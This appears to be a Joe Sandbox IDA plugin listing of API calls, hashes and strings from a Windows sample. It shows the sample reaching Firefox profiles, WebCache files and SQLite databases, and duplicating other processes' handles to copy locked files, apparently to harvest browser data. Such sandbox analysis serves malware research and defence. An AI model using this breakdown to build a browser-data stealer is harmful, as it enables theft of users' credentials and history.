                                                                                                                                                                                                                              • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2941347001-0
                                                                                                                                                                                                                              • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                                                                                                                                              • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                                                • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                                                                                                                • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                                                                                                              • wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                              • wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memsetwcscat$Closewcscpywcslen
                                                                                                                                                                                                                              • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                                                                                              • API String ID: 3249829328-1174173950
                                                                                                                                                                                                                              • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                                                                              • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                              • wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                              • wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                              • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 669240632-0
                                                                                                                                                                                                                              • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                                                                              • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • wcschr.MSVCRT ref: 00414458
                                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                                                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                                                                                              • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                                                                              • String ID: "%s"
                                                                                                                                                                                                                              • API String ID: 1343145685-3297466227
                                                                                                                                                                                                                              • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                                                                              • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                                                                                                                                              • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                                                                                              • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                                                                              • API String ID: 1714573020-3385500049
                                                                                                                                                                                                                              • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                                                              • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 004087D6
                                                                                                                                                                                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                                • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00408828
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00408840
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00408858
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00408870
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00408888
                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2911713577-0
                                                                                                                                                                                                                              • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                                                                                              • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                                                                                                                                              • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                                                                                                                                              • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcmp
                                                                                                                                                                                                                              • String ID: @ $SQLite format 3
                                                                                                                                                                                                                              • API String ID: 1475443563-3708268960
                                                                                                                                                                                                                              • Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                                                                                                                                                              • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                              • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressCloseProcVersionmemsetwcscpy
                                                                                                                                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                                              • API String ID: 2705122986-2036018995
                                                                                                                                                                                                                              • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                                                                                              • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _wcsicmpqsort
                                                                                                                                                                                                                              • String ID: /nosort$/sort
                                                                                                                                                                                                                              • API String ID: 1579243037-1578091866
                                                                                                                                                                                                                              • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                                                                              • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                                                                                              • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                                                                                                                                                              • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                                                                                              • API String ID: 3354267031-2114579845
                                                                                                                                                                                                                              • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                                                              • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                                                                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                                                                                              • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3473537107-0
                                                                                                                                                                                                                              • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                                              • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ??3@
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 613200358-0
                                                                                                                                                                                                                              • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                                                              • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                                              • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                                                                              • API String ID: 2221118986-1725073988
                                                                                                                                                                                                                              • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                                                              • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ??3@DeleteObject
                                                                                                                                                                                                                              • String ID: r!A
                                                                                                                                                                                                                              • API String ID: 1103273653-628097481
                                                                                                                                                                                                                              • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                                                                              • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ??2@
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1033339047-0
                                                                                                                                                                                                                              • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                                                              • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                                                              • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressProc$memcmp
                                                                                                                                                                                                                              • String ID: $$8
                                                                                                                                                                                                                              • API String ID: 2808797137-435121686
                                                                                                                                                                                                                              • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                                              • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                                                • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                                                • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                                                • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                                                • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                                                • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                                                • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                                                • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                                                • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                                                              • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                                                                                                                                                • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                                                • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                                                • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                                                                                                                                                                                                              • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                                                                                                                                                • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                                                • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                                                • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1979745280-0
                                                                                                                                                                                                                              • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                                                              • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                                                                                                              APIs
